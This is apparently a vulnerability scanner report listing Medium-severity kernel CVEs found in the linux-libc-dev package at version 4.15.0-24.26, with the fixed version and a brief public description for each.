Medium CVE-2019-7308 linux-libc-dev 4.15.0-24.26 4.15.0-47.50 kernel: eBPF: Spectre v1 mitigation bypass linux-libc-dev:4.15.0-24.26
Medium CVE-2019-8912 linux-libc-dev 4.15.0-24.26 4.15.0-47.50 kernel: af_alg_release() in crypto/af_alg.c neglects to set a NULL value for a certain structure member, which leads to a use-after-free in sockfs_setattr linux-libc-dev:4.15.0-24.26
Medium CVE-2019-8980 linux-libc-dev 4.15.0-24.26 4.15.0-47.50 kernel: memory leak in the kernel_read_file function in fs/exec.c allows to cause a denial of service linux-libc-dev:4.15.0-24.26
Medium CVE-2019-9213 linux-libc-dev 4.15.0-24.26 4.15.0-47.50 kernel: lack of check for mmap minimum address in expand_downwards in mm/mmap.c leads to NULL pointer dereferences exploit on non-SMAP platforms linux-libc-dev:4.15.0-24.26
Medium CVE-2019-9458 linux-libc-dev 4.15.0-24.26 4.15.0-58.64 kernel: use after free due to race condition in the video driver leads to local privilege escalation linux-libc-dev:4.15.0-24.26
Medium CVE-2019-9500 linux-libc-dev 4.15.0-24.26 4.15.0-50.54 kernel: brcmfmac heap buffer overflow in brcmf_wowl_nd_results linux-libc-dev:4.15.0-24.26
Medium CVE-2019-9503 linux-libc-dev 4.15.0-24.26 4.15.0-50.54 kernel: brcmfmac frame validation bypass linux-libc-dev:4.15.0-24.26
Medium CVE-2019-9506 linux-libc-dev 4.15.0-24.26 4.15.0-60.67 hardware: bluetooth: BR/EDR encryption key negotiation attacks (KNOB) linux-libc-dev:4.15.0-24.26
Medium CVE-2020-0067 linux-libc-dev 4.15.0-24.26 4.15.0-106.107 kernel: out of bounds read due to a missing bounds check in f2fs_xattr_generic_list of xattr.c leading to local information disclosure linux-libc-dev:4.15.0-24.26
Medium CVE-2020-0305 linux-libc-dev 4.15.0-24.26 4.15.0-91.92 kernel: possible use-after-free due to a race condition in cdev_get of char_dev.c linux-libc-dev:4.15.0-24.26
Medium CVE-2020-0404 linux-libc-dev 4.15.0-24.26 4.15.0-96.97 kernel: avoid cyclic entity chains due to malformed USB descriptors linux-libc-dev:4.15.0-24.26
Medium CVE-2020-0427 linux-libc-dev 4.15.0-24.26 4.15.0-88.88 kernel: out-of-bounds reads in pinctrl subsystem. linux-libc-dev:4.15.0-24.26
Medium CVE-2020-0430 linux-libc-dev 4.15.0-24.26 4.15.0-44.47 kernel: possible out-of-bounds read in skb_headlen of /include/linux/skbuff.h linux-libc-dev:4.15.0-24.26
Medium CVE-2020-0431 linux-libc-dev 4.15.0-24.26 4.15.0-91.92 kernel: possible out of bounds write in kbd_keycode of keyboard.c linux-libc-dev:4.15.0-24.26
Medium CVE-2020-0432 linux-libc-dev 4.15.0-24.26 4.15.0-96.97 kernel: possible out of bounds write in skb_to_mamac of networking.c linux-libc-dev:4.15.0-24.26
Medium CVE-2020-0433 linux-libc-dev 4.15.0-24.26 4.15.0-101.102 In blk_mq_queue_tag_busy_iter of blk-mq-tag.c, there is a possible use ... linux-libc-dev:4.15.0-24.26
Medium CVE-2020-0444 linux-libc-dev 4.15.0-24.26 4.15.0-99.100 kernel: bad kfree in auditfilter.c may lead to escalation of privilege linux-libc-dev:4.15.0-24.26
Medium CVE-2020-0465 linux-libc-dev 4.15.0-24.26 4.15.0-126.129 kernel: out of bounds write in hid-multitouch.c may lead to escalation of privilege linux-libc-dev:4.15.0-24.26
Medium CVE-2020-0466 linux-libc-dev 4.15.0-24.26 4.15.0-121.123 kernel: use after free in eventpoll.c may lead to escalation of privilege linux-libc-dev:4.15.0-24.26
Medium CVE-2020-10135 linux-libc-dev 4.15.0-24.26 4.15.0-129.132 kernel: bluetooth: BR/EDR Bluetooth Impersonation Attacks (BIAS) linux-libc-dev:4.15.0-24.26
Medium CVE-2020-10690 linux-libc-dev 4.15.0-24.26 4.15.0-88.88 kernel: use-after-free in cdev_put() when a PTP device is removed while its chardev is open linux-libc-dev:4.15.0-24.26
Medium CVE-2020-10720 linux-libc-dev 4.15.0-24.26 4.15.0-60.67 kernel: use-after-free read in napi_gro_frags() in the Linux kernel linux-libc-dev:4.15.0-24.26
Medium CVE-2020-10757 linux-libc-dev 4.15.0-24.26 4.15.0-112.113 kernel: DAX hugepages not considered during mremap linux-libc-dev:4.15.0-24.26
Medium CVE-2020-10766 linux-libc-dev 4.15.0-24.26 4.15.0-115.116 kernel: Rogue cross-process SSBD shutdown. Linux scheduler logical bug allows an attacker to turn off the SSBD protection. linux-libc-dev:4.15.0-24.26
Medium CVE-2020-10767 linux-libc-dev 4.15.0-24.26 4.15.0-115.116 kernel: Indirect Branch Prediction Barrier is force-disabled when STIBP is unavailable or enhanced IBRS is available. linux-libc-dev:4.15.0-24.26
Medium CVE-2020-10768 linux-libc-dev 4.15.0-24.26 4.15.0-115.116 kernel: Indirect branch speculation can be enabled after it was force-disabled by the PR_SPEC_FORCE_DISABLE prctl command. linux-libc-dev:4.15.0-24.26
Medium CVE-2020-10769 linux-libc-dev 4.15.0-24.26 4.15.0-55.60 kernel: Buffer over-read in crypto_authenc_extractkeys() when a payload longer than 4 bytes is not aligned. linux-libc-dev:4.15.0-24.26
Medium CVE-2020-10773 linux-libc-dev 4.15.0-24.26 4.15.0-72.81 kernel: kernel stack information leak on s390/s390x linux-libc-dev:4.15.0-24.26
Medium CVE-2020-10942 linux-libc-dev 4.15.0-24.26 4.15.0-99.100 kernel: vhost-net: stack overflow in get_raw_socket while checking sk_family field linux-libc-dev:4.15.0-24.26
Medium CVE-2020-11494 linux-libc-dev 4.15.0-24.26 4.15.0-101.102 kernel: transmission of uninitialized data allows attackers to read sensitive information linux-libc-dev:4.15.0-24.26
Medium CVE-2020-11565 linux-libc-dev 4.15.0-24.26 4.15.0-101.102 kernel: out-of-bounds write in mpol_parse_str function in mm/mempolicy.c linux-libc-dev:4.15.0-24.26
Medium CVE-2020-11608 linux-libc-dev 4.15.0-24.26 4.15.0-99.100 kernel: NULL pointer dereferences in ov511_mode_init_regs and ov518_mode_init_regs in drivers/media/usb/gspca/ov519.c linux-libc-dev:4.15.0-24.26
Medium CVE-2020-11609 linux-libc-dev 4.15.0-24.26 4.15.0-99.100 kernel: NULL pointer dereference due to incorrect handling of invalid descriptors in stv06xx subsystem linux-libc-dev:4.15.0-24.26
Medium CVE-2020-11668 linux-libc-dev 4.15.0-24.26 4.15.0-99.100 kernel: mishandles invalid descriptors in drivers/media/usb/gspca/xirlink_cit.c linux-libc-dev:4.15.0-24.26
Medium CVE-2020-11669 linux-libc-dev 4.15.0-24.26 4.15.0-101.102 kernel: powerpc: guest can cause DoS on POWER9 KVM hosts linux-libc-dev:4.15.0-24.26
Medium CVE-2020-11935 linux-libc-dev 4.15.0-24.26 4.15.0-112.113 kernel: panic hit by kube-proxy iptables-save/restore linux-libc-dev:4.15.0-24.26
Medium CVE-2020-12114 linux-libc-dev 4.15.0-24.26 4.15.0-106.107 kernel: DoS by corrupting mountpoint reference counter linux-libc-dev:4.15.0-24.26
Medium CVE-2020-12352 linux-libc-dev 4.15.0-24.26 4.15.0-122.124 kernel: net: bluetooth: information leak when processing certain AMP packets linux-libc-dev:4.15.0-24.26
Medium CVE-2020-12464 linux-libc-dev 4.15.0-24.26 4.15.0-106.107 kernel: use-after-free in usb_sg_cancel function in drivers/usb/core/message.c linux-libc-dev:4.15.0-24.26
Medium CVE-2020-12653 linux-libc-dev 4.15.0-24.26 4.15.0-96.97 kernel: buffer overflow in mwifiex_cmd_append_vsie_tlv function in drivers/net/wireless/marvell/mwifiex/scan.c linux-libc-dev:4.15.0-24.26
Medium CVE-2020-12655 linux-libc-dev 4.15.0-24.26 4.15.0-115.116 kernel: sync of excessive duration via an XFS v5 image with crafted metadata linux-libc-dev:4.15.0-24.26
Medium CVE-2020-12657 linux-libc-dev 4.15.0-24.26 4.15.0-101.102 kernel: use-after-free in block/bfq-iosched.c related to bfq_idle_slice_timer_body linux-libc-dev:4.15.0-24.26
Medium CVE-2020-12769 linux-libc-dev 4.15.0-24.26 4.15.0-96.97 kernel: DoS via concurrent calls to dw_spi_irq and dw_spi_transfer_one functions in drivers/spi/spi-dw.c linux-libc-dev:4.15.0-24.26
Medium CVE-2020-12826 linux-libc-dev 4.15.0-24.26 4.15.0-101.102 kernel: possible to send arbitrary signals to a privileged (suidroot) parent process linux-libc-dev:4.15.0-24.26
Medium CVE-2020-12888 linux-libc-dev 4.15.0-24.26 4.15.0-118.119 Kernel: vfio: access to disabled MMIO space of some devices may lead to DoS scenario linux-libc-dev:4.15.0-24.26
Medium CVE-2020-14314 linux-libc-dev 4.15.0-24.26 4.15.0-121.123 kernel: buffer uses out of index in ext3/4 filesystem linux-libc-dev:4.15.0-24.26
Medium CVE-2020-14356 linux-libc-dev 4.15.0-24.26 4.15.0-118.119 kernel: Use After Free vulnerability in cgroup BPF component linux-libc-dev:4.15.0-24.26
Medium CVE-2020-14381 linux-libc-dev 4.15.0-24.26 4.15.0-99.100 kernel: referencing inode of removed superblock in get_futex_key() causes UAF linux-libc-dev:4.15.0-24.26
Medium CVE-2020-14416 linux-libc-dev 4.15.0-24.26 4.15.0-91.92 kernel: slcan: race over tty->disc_data can lead to use-after-free linux-libc-dev:4.15.0-24.26
Medium CVE-2020-15436 linux-libc-dev 4.15.0-24.26 4.15.0-115.116 kernel: use-after-free in fs/block_dev.c linux-libc-dev:4.15.0-24.26
Medium CVE-2020-15780 linux-libc-dev 4.15.0-24.26 4.15.0-112.113 kernel: lockdown: bypass through ACPI write via acpi_configfs linux-libc-dev:4.15.0-24.26
Medium CVE-2020-16120 linux-libc-dev 4.15.0-24.26 4.15.0-121.123 kernel: incorrect unprivileged overlayfs permission checking may lead to information disclosure linux-libc-dev:4.15.0-24.26
Medium CVE-2020-16166 linux-libc-dev 4.15.0-24.26 4.15.0-118.119 kernel: information exposure in drivers/char/random.c and kernel/time/timer.c linux-libc-dev:4.15.0-24.26
Medium CVE-2020-1749 linux-libc-dev 4.15.0-24.26 4.15.0-106.107 kernel: some ipv6 protocols not encrypted over ipsec tunnel linux-libc-dev:4.15.0-24.26
Medium CVE-2020-24394 linux-libc-dev 4.15.0-24.26 4.15.0-115.116 kernel: umask not applied on filesystem without ACL support linux-libc-dev:4.15.0-24.26
Medium CVE-2020-24586 linux-libc-dev 4.15.0-24.26 4.15.0-151.157 kernel: Fragmentation cache not cleared on reconnection linux-libc-dev:4.15.0-24.26
Medium CVE-2020-24587 linux-libc-dev 4.15.0-24.26 4.15.0-151.157 kernel: Reassembling fragments encrypted under different keys linux-libc-dev:4.15.0-24.26
Medium CVE-2020-24588 linux-libc-dev 4.15.0-24.26 4.15.0-151.157 kernel: wifi frame payload being parsed incorrectly as an L2 frame linux-libc-dev:4.15.0-24.26
Medium CVE-2020-25211 linux-libc-dev 4.15.0-24.26 4.15.0-126.129 kernel: Local buffer overflow in ctnetlink_parse_tuple_filter in net/netfilter/nf_conntrack_netlink.c linux-libc-dev:4.15.0-24.26
Medium CVE-2020-25212 linux-libc-dev 4.15.0-24.26 4.15.0-121.123 kernel: TOCTOU mismatch in the NFS client code linux-libc-dev:4.15.0-24.26
Medium CVE-2020-25220 linux-libc-dev 4.15.0-24.26 4.15.0-118.119 kernel: use-after-free because skcd->no_refcnt was not considered during the backport of CVE-2020-14356 linux-libc-dev:4.15.0-24.26
Medium CVE-2020-25284 linux-libc-dev 4.15.0-24.26 4.15.0-126.129 kernel: incomplete permission checking for access to rbd devices linux-libc-dev:4.15.0-24.26
Medium CVE-2020-25641 linux-libc-dev 4.15.0-24.26 4.15.0-126.129 kernel: soft-lockups in iov_iter_copy_from_user_atomic() could result in DoS linux-libc-dev:4.15.0-24.26
Medium CVE-2020-25643 linux-libc-dev 4.15.0-24.26 4.15.0-126.129 kernel: improper input validation in ppp_cp_parse_cr function leads to memory corruption and read overflow linux-libc-dev:4.15.0-24.26
Medium CVE-2020-25645 linux-libc-dev 4.15.0-24.26 4.15.0-126.129 kernel: Geneve/IPsec traffic may be unencrypted between two Geneve endpoints linux-libc-dev:4.15.0-24.26
Medium CVE-2020-25668 linux-libc-dev 4.15.0-24.26 4.15.0-129.132 kernel: race condition in fg_console can lead to use-after-free in con_font_op linux-libc-dev:4.15.0-24.26
Medium CVE-2020-25670 linux-libc-dev 4.15.0-24.26 4.15.0-144.148 kernel: refcount leak in llcp_sock_bind() linux-libc-dev:4.15.0-24.26
Medium CVE-2020-25671 linux-libc-dev 4.15.0-24.26 4.15.0-144.148 kernel: refcount leak in llcp_sock_connect() linux-libc-dev:4.15.0-24.26
Medium CVE-2020-25672 linux-libc-dev 4.15.0-24.26 4.15.0-144.148 kernel: memory leak in llcp_sock_connect() linux-libc-dev:4.15.0-24.26
Medium CVE-2020-25673 linux-libc-dev 4.15.0-24.26 4.15.0-144.148 kernel: non-blocking socket in llcp_sock_connect() linux-libc-dev:4.15.0-24.26
Medium CVE-2020-25704 linux-libc-dev 4.15.0-24.26 4.15.0-135.139 kernel: perf_event_parse_addr_filter memory linux-libc-dev:4.15.0-24.26
Medium CVE-2020-25705 linux-libc-dev 4.15.0-24.26 4.15.0-129.132 kernel: ICMP rate limiting can be used for DNS poisoning attack linux-libc-dev:4.15.0-24.26
Medium CVE-2020-26088 linux-libc-dev 4.15.0-24.26 4.15.0-121.123 kernel: missing CAP_NET_RAW check in NFC socket creation in net/nfc/rawsock.c allows local attackers to create raw sockets linux-libc-dev:4.15.0-24.26
Medium CVE-2020-26139 linux-libc-dev 4.15.0-24.26 4.15.0-151.157 kernel: Forwarding EAPOL from unauthenticated wifi client linux-libc-dev:4.15.0-24.26
Medium CVE-2020-26147 linux-libc-dev 4.15.0-24.26 4.15.0-151.157 kernel: reassembling mixed encrypted/plaintext fragments linux-libc-dev:4.15.0-24.26
Medium CVE-2020-26555 linux-libc-dev 4.15.0-24.26 4.15.0-151.157 kernel: Bluetooth BR/EDR PIN Pairing procedure is vulnerable to an impersonation attack linux-libc-dev:4.15.0-24.26
Medium CVE-2020-26558 linux-libc-dev 4.15.0-24.26 4.15.0-151.157 bluez: Passkey Entry protocol of the Bluetooth Core is vulnerable to an impersonation attack linux-libc-dev:4.15.0-24.26
Medium CVE-2020-27066 linux-libc-dev 4.15.0-24.26 4.15.0-99.100 kernel: use after free in xfrm6_tunnel_free_spi of net/ipv6/xfrm6_tunnel.c leads to local escalation of privilege linux-libc-dev:4.15.0-24.26
Medium CVE-2020-27068 linux-libc-dev 4.15.0-24.26 4.15.0-99.100 Product: Android Versions: Android kernel Android ID: A-127973231 Referen ... linux-libc-dev:4.15.0-24.26
Medium CVE-2020-2732 linux-libc-dev 4.15.0-24.26 4.15.0-91.92 Kernel: kvm: nVMX: L2 guest may trick the L0 hypervisor to access sensitive L1 resources linux-libc-dev:4.15.0-24.26
Medium CVE-2020-27673 linux-libc-dev 4.15.0-24.26 4.15.0-129.132 kernel: xen: guest OS users can cause a DoS via a high rate of events to dom0 (XSA-332) linux-libc-dev:4.15.0-24.26
Medium CVE-2020-27777 linux-libc-dev 4.15.0-24.26 4.15.0-129.132 kernel: powerpc: RTAS calls can be used to compromise kernel integrity linux-libc-dev:4.15.0-24.26
Medium CVE-2020-27786 linux-libc-dev 4.15.0-24.26 4.15.0-109.110 kernel: use-after-free in kernel midi subsystem linux-libc-dev:4.15.0-24.26
Medium CVE-2020-27815 linux-libc-dev 4.15.0-24.26 4.15.0-136.140 kernel: Array index out of bounds access when setting extended attributes on journaling filesystems. linux-libc-dev:4.15.0-24.26
Medium CVE-2020-28097 linux-libc-dev 4.15.0-24.26 4.15.0-126.129 kernel: out-of-bounds read/write in vgacon_scrolldelta function linux-libc-dev:4.15.0-24.26
Medium CVE-2020-28915 linux-libc-dev 4.15.0-24.26 4.15.0-126.129 kernel: out-of-bounds read in fbcon_get_font function linux-libc-dev:4.15.0-24.26
Medium CVE-2020-28974 linux-libc-dev 4.15.0-24.26 4.15.0-129.132 kernel: slab-out-of-bounds read in fbcon linux-libc-dev:4.15.0-24.26
Medium CVE-2020-29368 linux-libc-dev 4.15.0-24.26 4.15.0-115.116 kernel: the copy-on-write implementation can grant unintended write access because of a race condition in a THP mapcount check linux-libc-dev:4.15.0-24.26
Medium CVE-2020-29370 linux-libc-dev 4.15.0-24.26 4.15.0-99.100 kernel: Race condition in SLUB bulk alloc slowpath linux-libc-dev:4.15.0-24.26
Medium CVE-2020-29371 linux-libc-dev 4.15.0-24.26 4.15.0-121.123 kernel: crafted romfs filesystem leaks uninitialized memory to userspace linux-libc-dev:4.15.0-24.26
Medium CVE-2020-29374 linux-libc-dev 4.15.0-24.26 4.15.0-136.140 kernel: the get_user_pages implementation when used for a copy-on-write page does not properly consider the semantics of read operations and therefore can grant unintended read access linux-libc-dev:4.15.0-24.26
Medium CVE-2020-29660 linux-libc-dev 4.15.0-24.26 4.15.0-136.140 kernel: locking inconsistency in drivers/tty/tty_io.c and drivers/tty/tty_jobctrl.c can lead to a read-after-free linux-libc-dev:4.15.0-24.26
Medium CVE-2020-35519 linux-libc-dev 4.15.0-24.26 4.15.0-136.140 kernel: x25_bind out-of-bounds read linux-libc-dev:4.15.0-24.26
Medium CVE-2020-36158 linux-libc-dev 4.15.0-24.26 4.15.0-137.141 kernel: buffer overflow in mwifiex_cmd_802_11_ad_hoc_start function in drivers/net/wireless/marvell/mwifiex/join.c via a long SSID value linux-libc-dev:4.15.0-24.26
Medium CVE-2020-36312 linux-libc-dev 4.15.0-24.26 4.15.0-126.129 kernel: memory leak upon a kmalloc failure in kvm_io_bus_unregister_dev function in virt/kvm/kvm_main.c linux-libc-dev:4.15.0-24.26
Medium CVE-2020-36322 linux-libc-dev 4.15.0-24.26 4.15.0-162.170 kernel: fuse: fuse_do_getattr() calls make_bad_inode() in inappropriate situations linux-libc-dev:4.15.0-24.26
Medium CVE-2020-36385 linux-libc-dev 4.15.0-24.26 4.15.0-162.170 kernel: use-after-free in drivers/infiniband/core/ucma.c ctx use-after-free linux-libc-dev:4.15.0-24.26
Medium CVE-2020-36386 linux-libc-dev 4.15.0-24.26 4.15.0-118.119 kernel: slab out-of-bounds read in hci_extended_inquiry_result_evt() in net/bluetooth/hci_event.c linux-libc-dev:4.15.0-24.26
Medium CVE-2020-3702 linux-libc-dev 4.15.0-24.26 4.15.0-161.169 kernel: ath9k: information disclosure via specifically timed and handcrafted traffic linux-libc-dev:4.15.0-24.26
Medium CVE-2020-4788 linux-libc-dev 4.15.0-24.26 4.15.0-126.129 kernel: speculation on incompletely validated data on IBM Power9 linux-libc-dev:4.15.0-24.26
Medium CVE-2020-7053 linux-libc-dev 4.15.0-24.26 4.15.0-76.86 kernel: use-after-free in i915_ppgtt_close in drivers/gpu/drm/i915/i915_gem_gtt.c linux-libc-dev:4.15.0-24.26
Medium CVE-2020-8428 linux-libc-dev 4.15.0-24.26 4.15.0-96.97 kernel: use-after-free in fs/namei.c linux-libc-dev:4.15.0-24.26
Medium CVE-2020-8647 linux-libc-dev 4.15.0-24.26 4.15.0-99.100 kernel: out-of-bounds read in vc_do_resize function in drivers/tty/vt/vt.c linux-libc-dev:4.15.0-24.26
Medium CVE-2020-8648 linux-libc-dev 4.15.0-24.26 4.15.0-99.100 kernel: use-after-free in n_tty_receive_buf_common function in drivers/tty/n_tty.c linux-libc-dev:4.15.0-24.26
Medium CVE-2020-8649 linux-libc-dev 4.15.0-24.26 4.15.0-99.100 kernel: invalid read location in vgacon_invert_region function in drivers/video/console/vgacon.c linux-libc-dev:4.15.0-24.26
Medium CVE-2020-8694 linux-libc-dev 4.15.0-24.26 4.15.0-123.126 kernel: Insufficient access control vulnerability in PowerCap Framework linux-libc-dev:4.15.0-24.26
Medium CVE-2020-8832 linux-libc-dev 4.15.0-24.26 4.15.0-91.92 kernel: incomplete fix for CVE-2019-14615 allows for a local information exposure linux-libc-dev:4.15.0-24.26
Medium CVE-2020-8834 linux-libc-dev 4.15.0-24.26 4.15.0-96.97 Kernel: ppc: kvm: conflicting use of HSTATE_HOST_R1 to store r1 state leads to host stack corruption linux-libc-dev:4.15.0-24.26
Medium CVE-2021-0129 linux-libc-dev 4.15.0-24.26 4.15.0-151.157 kernel: Improper access control in BlueZ may allow information disclosure vulnerability. linux-libc-dev:4.15.0-24.26
Medium CVE-2021-0342 linux-libc-dev 4.15.0-24.26 4.15.0-115.116 kernel: use after free in tun_get_user of tun.c could lead to local escalation of privilege linux-libc-dev:4.15.0-24.26
Medium CVE-2021-0448 linux-libc-dev 4.15.0-24.26 4.15.0-126.129 [Unknown description] linux-libc-dev:4.15.0-24.26
Medium CVE-2021-0512 linux-libc-dev 4.15.0-24.26 4.15.0-143.147 kernel: out-of-bounds write due to a heap buffer overflow in __hidinput_change_resolution_multipliers() of hid-input.c linux-libc-dev:4.15.0-24.26
Medium CVE-2021-0605 linux-libc-dev 4.15.0-24.26 4.15.0-126.129 kernel: In pfkey_dump() dplen and splen can both be specified to access the xfrm_address_t structure out of bounds linux-libc-dev:4.15.0-24.26
Medium CVE-2021-0920 linux-libc-dev 4.15.0-24.26 4.15.0-159.167 kernel: Use After Free in unix_gc() which could result in a local privilege escalation linux-libc-dev:4.15.0-24.26
Medium CVE-2021-0937 linux-libc-dev 4.15.0-24.26 4.15.0-144.148 [Unknown description] linux-libc-dev:4.15.0-24.26
Medium CVE-2021-0941 linux-libc-dev 4.15.0-24.26 4.15.0-144.148 kernel: out-of-bounds read in bpf_skb_change_head() of filter.c due to a use-after-free linux-libc-dev:4.15.0-24.26
Medium CVE-2021-1048 linux-libc-dev 4.15.0-24.26 4.15.0-126.129 kernel: Use After Free in epoll_loop_check_proc() which could result in a local privilege escalation linux-libc-dev:4.15.0-24.26
Medium CVE-2021-20321 linux-libc-dev 4.15.0-24.26 4.15.0-166.174 kernel: In Overlayfs missing a check for a negative dentry before calling vfs_rename() linux-libc-dev:4.15.0-24.26
Medium CVE-2021-20322 linux-libc-dev 4.15.0-24.26 4.15.0-167.175 kernel: new DNS Cache Poisoning Attack based on ICMP fragment needed packets replies linux-libc-dev:4.15.0-24.26
Medium CVE-2021-21781 linux-libc-dev 4.15.0-24.26 4.15.0-143.147 kernel: arm: SIGPAGE information disclosure vulnerability linux-libc-dev:4.15.0-24.26
Medium CVE-2021-22543 linux-libc-dev 4.15.0-24.26 4.15.0-159.167 kernel: Improper handling of VM_IO|VM_PFNMAP vmas in KVM can bypass RO checks linux-libc-dev:4.15.0-24.26
Medium CVE-2021-22600 linux-libc-dev 4.15.0-24.26 4.15.0-169.177 kernel: double free in packet_set_ring() in net/packet/af_packet.c linux-libc-dev:4.15.0-24.26
Medium CVE-2021-23133 linux-libc-dev 4.15.0-24.26 4.15.0-147.151 kernel: Race condition in sctp_destroy_sock list_del linux-libc-dev:4.15.0-24.26
Medium CVE-2021-23134 linux-libc-dev 4.15.0-24.26 4.15.0-151.157 kernel: use-after-free in nfc sockets linux-libc-dev:4.15.0-24.26
Medium CVE-2021-26401 linux-libc-dev 4.15.0-24.26 4.15.0-177.186 hw: cpu: LFENCE/JMP Mitigation Update for CVE-2017-5715 linux-libc-dev:4.15.0-24.26
Medium CVE-2021-26932 linux-libc-dev 4.15.0-24.26 4.15.0-143.147 An issue was discovered in the Linux kernel 3.2 through 5.10.16, as us ... linux-libc-dev:4.15.0-24.26
Medium CVE-2021-27363 linux-libc-dev 4.15.0-24.26 4.15.0-139.143 kernel: iscsi: unrestricted access to sessions and handles linux-libc-dev:4.15.0-24.26
Medium CVE-2021-27364 linux-libc-dev 4.15.0-24.26 4.15.0-139.143 kernel: out-of-bounds read in libiscsi module linux-libc-dev:4.15.0-24.26
Medium CVE-2021-28038 linux-libc-dev 4.15.0-24.26 4.15.0-143.147 An issue was discovered in the Linux kernel through 5.11.3, as used wi ... linux-libc-dev:4.15.0-24.26
Medium CVE-2021-28660 linux-libc-dev 4.15.0-24.26 4.15.0-144.148 kernel: buffer overflow in rtw_wx_set_scan function in drivers/staging/rtl8188eu/os_dep/ioctl_linux.c linux-libc-dev:4.15.0-24.26
Medium CVE-2021-28714 linux-libc-dev 4.15.0-24.26 4.15.0-169.177 Guest can force Linux netback driver to hog large amounts of kernel me ... linux-libc-dev:4.15.0-24.26
Medium CVE-2021-28715 linux-libc-dev 4.15.0-24.26 4.15.0-169.177 Guest can force Linux netback driver to hog large amounts of kernel me ... linux-libc-dev:4.15.0-24.26
Medium CVE-2021-28964 linux-libc-dev 4.15.0-24.26 4.15.0-144.148 kernel: race condition in get_old_root function in fs/btrfs/ctree.c because of a lack of locking on an extent buffer before a cloning operation linux-libc-dev:4.15.0-24.26
Medium CVE-2021-28971 linux-libc-dev 4.15.0-24.26 4.15.0-144.148 kernel: System crash in intel_pmu_drain_pebs_nhm in arch/x86/events/intel/ds.c linux-libc-dev:4.15.0-24.26
Medium CVE-2021-28972 linux-libc-dev 4.15.0-24.26 4.15.0-144.148 kernel: Buffer overflow in hotplug/rpadlpar_sysfs.c linux-libc-dev:4.15.0-24.26
Medium CVE-2021-29155 linux-libc-dev 4.15.0-24.26 4.15.0-151.157 kernel: protection for sequences of pointer arithmetic operations against speculatively out-of-bounds loads can be bypassed to leak content of kernel memory linux-libc-dev:4.15.0-24.26
Medium CVE-2021-29264 linux-libc-dev 4.15.0-24.26 4.15.0-143.147 kernel: DoS due to negative fragment size calculation in drivers/net/ethernet/freescale/gianfar.c linux-libc-dev:4.15.0-24.26
Medium CVE-2021-29265 linux-libc-dev 4.15.0-24.26 4.15.0-143.147 kernel: race conditions in usbip_sockfd_store function in drivers/usb/usbip/stub_dev.c can lead to DoS linux-libc-dev:4.15.0-24.26
Medium CVE-2021-29650 linux-libc-dev 4.15.0-24.26 4.15.0-143.147 kernel: lack a full memory barrier upon the assignment of a new table value in net/netfilter/x_tables.c and include/linux/netfilter/x_tables.h may lead to DoS linux-libc-dev:4.15.0-24.26
Medium CVE-2021-30002 linux-libc-dev 4.15.0-24.26 4.15.0-143.147 kernel: memory leak for large arguments in video_usercopy function in drivers/media/v4l2-core/v4l2-ioctl.c linux-libc-dev:4.15.0-24.26
Medium CVE-2021-31829 linux-libc-dev 4.15.0-24.26 4.15.0-151.157 kernel: protection of stack pointer against speculative pointer arithmetic can be bypassed to leak content of kernel memory linux-libc-dev:4.15.0-24.26
Medium CVE-2021-31916 linux-libc-dev 4.15.0-24.26 4.15.0-144.148 kernel: out of bounds array access in drivers/md/dm-ioctl.c linux-libc-dev:4.15.0-24.26
Medium CVE-2021-32399 linux-libc-dev 4.15.0-24.26 4.15.0-151.157 kernel: race condition for removal of the HCI controller linux-libc-dev:4.15.0-24.26
Medium CVE-2021-33033 linux-libc-dev 4.15.0-24.26 4.15.0-144.148 kernel: use-after-free in cipso_v4_genopt in net/ipv4/cipso_ipv4.c linux-libc-dev:4.15.0-24.26
Medium CVE-2021-33034 linux-libc-dev 4.15.0-24.26 4.15.0-151.157 kernel: use-after-free in net/bluetooth/hci_event.c when destroying an hci_chan linux-libc-dev:4.15.0-24.26
Medium CVE-2021-33098 linux-libc-dev 4.15.0-24.26 4.15.0-151.157 kernel: Improper input validation in the Intel(R) Ethernet ixgbe driver may allow an authenticated user to potentially enable DoS via local access linux-libc-dev:4.15.0-24.26
Medium CVE-2021-3347 linux-libc-dev 4.15.0-24.26 4.15.0-141.145 kernel: Use after free via PI futex state linux-libc-dev:4.15.0-24.26
Medium CVE-2021-3348 linux-libc-dev 4.15.0-24.26 4.15.0-141.145 kernel: Use-after-free in ndb_queue_rq() in drivers/block/nbd.c linux-libc-dev:4.15.0-24.26
Medium CVE-2021-3483 linux-libc-dev 4.15.0-24.26 4.15.0-144.148 kernel: use-after-free in nosy driver in nosy_ioctl() in drivers/firewire/nosy.c when a device is added twice linux-libc-dev:4.15.0-24.26
Medium CVE-2021-3506 linux-libc-dev 4.15.0-24.26 4.15.0-173.182 kernel: Out of bounds memory access bug in get_next_net_page() in fs/f2fs/node.c linux-libc-dev:4.15.0-24.26
Medium CVE-2021-3564 linux-libc-dev 4.15.0-24.26 4.15.0-154.161 kernel: double free in bluetooth subsystem when the HCI device initialization fails linux-libc-dev:4.15.0-24.26
Medium CVE-2021-3573 linux-libc-dev 4.15.0-24.26 4.15.0-154.161 kernel: use-after-free in function hci_sock_bound_ioctl() linux-libc-dev:4.15.0-24.26
Medium CVE-2021-3612 linux-libc-dev 4.15.0-24.26 4.15.0-156.163 kernel: joydev: zero size passed to joydev_handle_JSIOCSBTNMAP() linux-libc-dev:4.15.0-24.26
Medium CVE-2021-3640 linux-libc-dev 4.15.0-24.26 4.15.0-167.175 kernel: use-after-free vulnerability in function sco_sock_sendmsg() linux-libc-dev:4.15.0-24.26
Medium CVE-2021-3655 linux-libc-dev 4.15.0-24.26 4.15.0-162.170 kernel: missing size validations on inbound SCTP packets linux-libc-dev:4.15.0-24.26
Medium CVE-2021-3659 linux-libc-dev 4.15.0-24.26 4.15.0-144.148 kernel: NULL pointer dereference in llsec_key_alloc() in net/mac802154/llsec.c linux-libc-dev:4.15.0-24.26
Medium CVE-2021-3732 linux-libc-dev 4.15.0-24.26 4.15.0-159.167 kernel: overlayfs: Mounting overlayfs inside an unprivileged user namespace can reveal files linux-libc-dev:4.15.0-24.26
Medium CVE-2021-3743 linux-libc-dev 4.15.0-24.26 4.15.0-162.170 kernel: out-of-bound Read in qrtr_endpoint_post in net/qrtr/qrtr.c linux-libc-dev:4.15.0-24.26
Medium CVE-2021-3752 linux-libc-dev 4.15.0-24.26 4.15.0-167.175 kernel: possible use-after-free in bluetooth module linux-libc-dev:4.15.0-24.26
Medium CVE-2021-3753 linux-libc-dev 4.15.0-24.26 4.15.0-162.170 kernel: a race out-of-bound read in vt linux-libc-dev:4.15.0-24.26
